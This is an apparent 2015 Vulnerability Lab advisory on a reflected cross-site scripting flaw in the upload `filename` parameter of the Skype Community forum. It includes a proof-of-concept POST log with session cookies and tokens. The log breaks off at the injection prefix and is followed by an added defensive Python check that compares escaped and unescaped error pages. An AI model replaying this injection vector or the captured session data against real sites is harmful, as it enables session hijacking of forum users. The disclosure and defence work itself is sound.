Document Title:
===============
Lithium Forum - Client Side POST Inject Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1519

Release Date:
=============
2015-12-22

Vulnerability Laboratory ID (VL-ID):
====================================
1519

Common Vulnerability Scoring System:
====================================
3.7

Product & Service Introduction:
===============================
Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com. Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia. Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype's original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side POST inject web vulnerability in the official Microsoft Skype Community online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-06-10: Researcher Notification & Coordination (Hadji Samir - Evolution Security)
2015-06-12: Vendor Notification 1 (Security Team)
2015-**-**: Vendor Response/Feedback (Security Team)
2015-11-30: Vendor Fix/Patch (Developer Team)
2015-12-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Microsoft Skype Community online service web-application. The vulnerability allows remote attackers to manipulate client-side browser requests to the application in order to compromise session data. The vulnerability is located in the `filename` value of the `t5/forums/postpage.messageeditorform.form.form.form` module of the Skype Community. Remote attackers are able to inject malicious script code into client-side application requests, and can prepare specially crafted web links that execute client-side script code and compromise the session data of Skype Community forum users and admins. The script code is executed in the exception handling of the upload POST request. The attack vector is located on the client side of the online service, and the request method used to inject or execute the code is POST. During testing and research we found that several high-profile vendors use the commercial Lithium web application.
The security risk of the non-persistent cross site scripting vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.7. Exploitation of the non-persistent cross site scripting web vulnerability requires a low-privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading of malicious script code, or non-persistent manipulation of web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Skype Community > t5/forums/

Vulnerable File(s):
[+] t5/forums/postpage.messageeditorform.form.form.form

Vulnerable Parameter(s):
[+] filename

Proof of Concept (PoC):
=======================
The client-side cross site scripting exception web vulnerability can be exploited by remote attackers with a low-privilege web application user account. For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

PoC: Exception handling - Lithium Forum (Skype Community)
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://community.skype.com/t5/forums/postpage.messageeditorform.form.form.form
   Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type]
   Request Headers:
      Host[community.skype.com]
      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Referer[http://community.skype.com/t5/forums/postpage/board-id/Translations]
      Cookie[s_pers=%20s_fid%3D7EADA82B25D3A7FE-22BADDF02FFE01AA%7C1497227269918%3B%20gpv_p23%3Dskypeloginweb%252Faccount%252Flogin_simplified%7C1434070669927%3B%20s_nr%3D1434068869930-New%7C1497140869930%3B; s_vi=[CS]v1|2A928C6305013CDB-400001382002F848[CE]; mbox=PC#1432859941701-111791.21_17#1441809665|check#true#1434033725|session#1434033624289-491084#1434035525; MSFPC=ID=062a86ae8adbf044abf02f8708319e16&CS=3&LV=201505&V=1; skype-cookie-policy=1; __CT_Data=gpv=8&apv_22_www11=8; WRUID=0; tracking=1434066476905; LithiumVisitor=~2DnruWrh4zSyqDVNA~S0FDSAeLLXNQyv0LgPfS9o8gMCZ3senMywpX_sC4UwFikHehjm8U36pL1fZCwO8eBYk9-nOUeHTeBLnBFc1GjA..; VISITOR_BEACON=~2aphhH89BL1W7xf7Z~BE1YzkXD5ndxpLhY4Z2bhqwTa1-Tkq0Eo22Ev9ddHp4EVfp-37vFXnbCv1PHXjc5q9aISMdRK_3MyqKXFuGfKw..; SC=CC=:CCY=:ENV=:LC=en:LIM=:RS=d:TM=1434068870:TS=1434068870:TZ=:UCP=:VAT=:VER=; s_fid=68392C6301561E0C-0629E4B49FBC4542; gpv_p23=support%2Fforum%2Ft5%2Fforums%2Fpostpage%2Fboard-id%2FTranslations; s_nr=1434070798741-New; LiSESSIONID=6859188E4B50DDB80D41B1EABB669A41; s_cc=true; s_ria=flash%2011%7C; s_sq=%5B%5BB%5D%5D; s_sv_sid=346493096323]
      X-Forwarded-For[8.8.8.8]
      Connection[keep-alive]
   Post Data:
      POST_DATA[-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="t:ac"

board-id/Translations
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="liaFormContentKey"

PostPage:board-id/Translations:messageeditorform.form.form:
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="t:formdata"

rPBMQ5753M6ha7eiSCGUSDWmAZo=:H4sIAAAAAAAAAN1YT2wVRRifViuFF6TFYDXGhEMlNKS7fbwWEWyaWqmA/ScvkHCRzO7Oe2/o7s4yM/v2NUYTEqImetRwM5pwEzzKjRg5mF68QLyKxisJAaMHMXFmZ1/7alvpzm4bX99h9+038/2+f7+Z+Xav3wddkQkGK4SGHjPnCONzsIqOeYgxcUcO5oSKQc+ILy4hwYUhRoFBaNWAAbRryOAwQIzThRHDJhS52BJ3LyA+8jkzpoRG/+GHQWXgree/HusEoBFsvr3SdwevnCz9fgNo2SteAh+ADi2tp1JrpY5tOFsupZfpK64X2xbmsZQ6jyODs4s/DYD3FrXymN5e8fxvNx5Vbt75StveTCp7Z8S4GCpzyNEkJV5ZPjkTLhZTzkE3RINXv7/7Mdj/dyfomAIFe3mAg71TF2Edmi70q2aZU+xXjzcCDnpgyAmDdTQpnLSgPR+9CkY2GEVASYAoX1ByEc0xF/MaDj0jQtbhVu9dbMwlk0/Ek/vLiIfBCb+OKfE9Med0b+eln0vmYOx5dxNZ8qbQCORtdxbHXt+4YxMugv4K17xzt97ff7LvL70iay3OEpNquzjYwULrIrK5fvAS6Fl5eS5ygMUQpHbNrBdNm/iCBVbIMfGZOa2wyvHwROtQbEqpWUgYQIGwX8HIdYw1pSLbI/9JagsyZIxbQghtPilVFBleOXu78Mu+Hx4n3JU+EHcGeighQUsytiqQ8bSBCC7ZwoFyaHmYMWH19jfOcOWPL35U3NEtosxA7xYz72mLOAs50O6lqAjMJ2OskMTa+zjYnUjV0tQAkjgvRtPg7ZR6IhpUxyhioWdhbjBZTy6Jhhp8yTklnVDSnI0ox8fAaFpMjv0Fz/53HqV02m7mMSuscq6dyLzHE+Ow7OMgQPwsdXPgdX90EBywXGLPm60nyBtSwpoHYQ07DvKbZVjlxYYR2ijjaXuoI0M9D46+e+3TUf3jdYeW1k5tNhUg5yI62RuwHJh0KHoHzD4Zo8XoUg4N1MBMrM1qy6A6vBLKvdCcML48IT6qNsGmIukcmNHETbbD9ULpS8ZXRZK7xayByH+QonUDScZzDGQdiyqQUXBcE1bSXi2w7Bg7M2KIjeU17Zelxct9vHr12yuqt4zlzhrvRbNxeynei4SxXik2pNg4JY7kKqJ7f/3y2p+XPzoqQE6BrrpUb1DQszxvRhzkiH54/fOXC5/d+yTez4D4ReNgTLeuNWTPW6TRpE53U5ADZooWY02cMHAJXCL1M+oxM15elO3KSjcJonb8I6KGHTkWcVdTcGHof1fGbvUoPNsuhZQYA23ROilP26EB6pGHjc+Td+0zqJJDF/Rm+n56tRvbsKHWYkVR/5PwNvyQPKxla1jZ2tDuE1/UC/zaHwv2rPhYILbXbLCKvjoBpS7vZqah2D5pyLKi/gGUanyqkRsAAA==
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="lia-action-token"

JI23tj8UIO7nM2i7fsBN0c0nk6iT6Ws1OY2SjC2EQiE.
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="form_UID"

form
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="form_instance_key"

-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="subject"

sdfsdf
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="submitContextX"

Preview
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="tinyMceEditor"

sdfsdf sdffds dsfsdf
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="mediaSnippetUrl"

-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="existingAttachmentsField"

[]
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="previewAttachmentsField"

[]
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="compareAttachmentsField"

[]
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="checkbox"

on
-----------------------------102110556414691098141506762642
Content-Disposition: form-data; name="upload"; filename="\">
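To make the defect class described in the Technical Details section and shown in the PoC log concrete from the defender's side, the following added example (not code from the advisory, from Lithium or from Skype) parses a constructed multipart/form-data body shaped like the PoC request, extracts the `filename` value of the `upload` part, and renders a stand-in upload exception page two ways: once reflecting the raw filename, once HTML-escaping it first. The error-page template, the field values and the test filename are constructed assumptions; only the boundary string mirrors the one in the log. A small tag-set check reports which rendering lets markup that the template never emitted reach the page, which is the kind of regression check a fix for this class of bug should ship with.

```python
import html
import re

# Constructed sample request body shaped like the advisory's PoC log: a Firefox-style
# multipart/form-data upload. The boundary mirrors the one in the log; the field values
# and the filename are constructed test data, not the advisory's own payload.
BOUNDARY = "---------------------------102110556414691098141506762642"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="subject"\r\n\r\nsdfsdf\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="checkbox"\r\n\r\non\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload"; filename="\\"><b>injected</b>"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "not a real file\r\n"
    f"--{BOUNDARY}--\r\n"
)

# name="..." followed by an optional filename="..." whose value may contain \" escapes
DISPOSITION_RE = re.compile(r'name="([^"]*)"(?:; filename="((?:\\.|[^"\\])*)")?')


def parse_multipart(body: str, boundary: str) -> dict:
    """Return {field name: (filename or None, content)} for every part of the body."""
    parts = {}
    for chunk in body.split(f"--{boundary}"):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":          # leading empty piece / closing "--"
            continue
        head, _, content = chunk.partition("\r\n\r\n")
        m = DISPOSITION_RE.search(head)
        if not m:
            continue
        name, filename = m.group(1), m.group(2)
        if filename is not None:
            filename = filename.replace('\\"', '"')   # undo backslash quoting of "
        parts[name] = (filename, content)
    return parts


# Hypothetical exception page: the failed filename is echoed back in a hidden input,
# the context in which a leading "> closes the attribute and opens new markup.
ERROR_TEMPLATE = (
    '<div class="error"><p>Could not upload the selected file.</p>'
    '<input type="hidden" name="filename" value="{filename}"></div>'
)


def render_upload_error_vulnerable(filename: str) -> str:
    # The defect class from the advisory: raw user input reflected into HTML.
    return ERROR_TEMPLATE.format(filename=filename)


def render_upload_error_fixed(filename: str) -> str:
    # Mitigation: contextual output encoding (quotes included) before the value hits HTML.
    return ERROR_TEMPLATE.format(filename=html.escape(filename, quote=True))


TAG_RE = re.compile(r"</?([a-zA-Z][a-zA-Z0-9]*)")
EXPECTED_TAGS = {"div", "p", "input"}        # everything the template itself emits


def foreign_tags(rendered: str) -> set:
    """Tag names present in the rendered page that the template did not put there."""
    return {m.group(1).lower() for m in TAG_RE.finditer(rendered)} - EXPECTED_TAGS


def demo() -> dict:
    """Parse the sample upload and compare both renderings of the exception page."""
    parts = parse_multipart(SAMPLE_BODY, BOUNDARY)
    filename = parts["upload"][0]
    return {
        "filename": filename,
        "vulnerable": foreign_tags(render_upload_error_vulnerable(filename)),
        "fixed": foreign_tags(render_upload_error_fixed(filename)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script prints the extracted filename, a non-empty set of foreign tags for the unescaped rendering and an empty set for the escaped one; the same `foreign_tags` check can be pointed at real responses of an upload error path during regression testing.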